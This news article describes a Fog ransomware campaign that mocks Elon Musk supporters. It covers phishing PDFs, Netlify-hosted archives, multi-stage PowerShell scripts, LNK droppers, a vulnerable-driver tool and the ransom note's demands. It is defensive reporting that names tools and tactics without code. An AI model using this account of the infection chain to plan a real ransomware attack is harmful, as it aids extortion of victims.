Cybersecurity experts have uncovered a sophisticated ransomware campaign that specifically targets and mocks supporters of Elon Musk. This attack uses advanced PowerShell scripts and payloads hosted on the Netlify platform to deliver its malicious code.
Attack Overview
The ransomware, identified as a variant of the Fog Ransomware family, blends financial motives with political satire. Its ransom note impersonates an individual named “Edward Coristine,” who is allegedly linked to the DOGE cryptocurrency initiative. Unusually, the note lists government email addresses as technical support contacts and includes mocking messages aimed at Musk’s followers.
When executed, the malware opens a YouTube video that ridicules Elon Musk. This serves both as a distraction and as a reinforcement of the attack’s parodical nature.
Infection Method and Technical Details
Researchers at KrakenLabs traced the infection to phishing emails containing PDF attachments titled “Pay Adjustment.” Opening the PDF directs victims to a Netlify-hosted ZIP archive. This archive deploys a chain of PowerShell scripts starting with Pay.ps1, which coordinates the attack.
The infection chain is complex. It uses .lnk file droppers and multiple stages of PowerShell execution. Key components include:
cwiper.exe– the main ransomware encryptorktool.exe– leverages Intel’s Bring Your Own Vulnerable Driver (BYOVD) technique for kernel-level access- PowerShell scripts for reconnaissance and persistence
One of the most technically advanced scripts, trackerjacker.ps1, uses XOR-based obfuscation to avoid detection. After decoding, it performs system reconnaissance. Another script, lootsubmit.ps1, collects geolocation data using the Wigle API.
Financial Motive Behind the Satire
Despite its mocking tone, the ransomware demands payment in Monero cryptocurrency, confirming its financial intent. The ransom note demands around $1,000 and instructs victims to provide five bullet points detailing their work accomplishments from the previous week. It also threatens a penalty of “a trillion dollars” if the victim fails to comply.
The attackers claim they will decrypt files for free only if victims help spread the ransomware to new targets, adding a viral element to the attack.
Psychological and Technical Sophistication
This campaign is a notable example of how ransomware groups now combine psychological manipulation with technical skill. By targeting a politically charged audience and embedding satire, the attackers aim to confuse and distract victims while executing their malicious payload.
The infection begins simply with a phishing PDF, but the underlying attack involves a multi-stage PowerShell script chain and kernel-level exploits. This level of sophistication highlights the evolving threat landscape where financial crime and political trolling intersect.
“FOG ransomware is a relatively new family that organizations should monitor closely,” cybersecurity analysts warn. “Its combination of political mockery and financial extortion represents a new trend in ransomware tactics.”
Victims are urged to exercise caution with unexpected email attachments, especially those claiming to contain pay or work adjustment information, as these remain a common vector for ransomware infections.
